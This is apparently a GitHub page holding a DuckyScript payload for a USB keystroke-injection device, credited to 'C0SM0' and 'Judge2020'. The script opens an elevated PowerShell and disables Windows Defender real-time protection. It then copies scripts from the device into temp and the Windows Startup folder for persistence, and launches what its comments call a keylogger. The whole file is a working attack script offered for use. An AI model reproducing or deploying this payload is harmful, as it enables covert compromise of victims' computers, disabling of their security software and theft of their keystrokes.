-
Notifications
You must be signed in to change notification settings - Fork 1
/
payload.dd
56 lines (49 loc) · 1.22 KB
/
payload.dd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
REM created by : C0SM0
REM Windows 10: Disable Windows Defender with Powershell
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 2000
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 2000
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
STRING exit
ENTER
REM STAGE1
REM open runbox
DELAY 1000
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 300
REM STAGE 3
REM move files to appropiate directories
REM change 'L' to the name of your ducky
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'CIRCUITPY'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";
ENTER
DELAY 200
REM STAGE 4
REM run keylogger
STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd
ENTER
DELAY 200
REM open runbox
DELAY 1000
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 300
STRING cd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";.\c.cmd;exit
REM STAGE 5
REM deploy
ENTER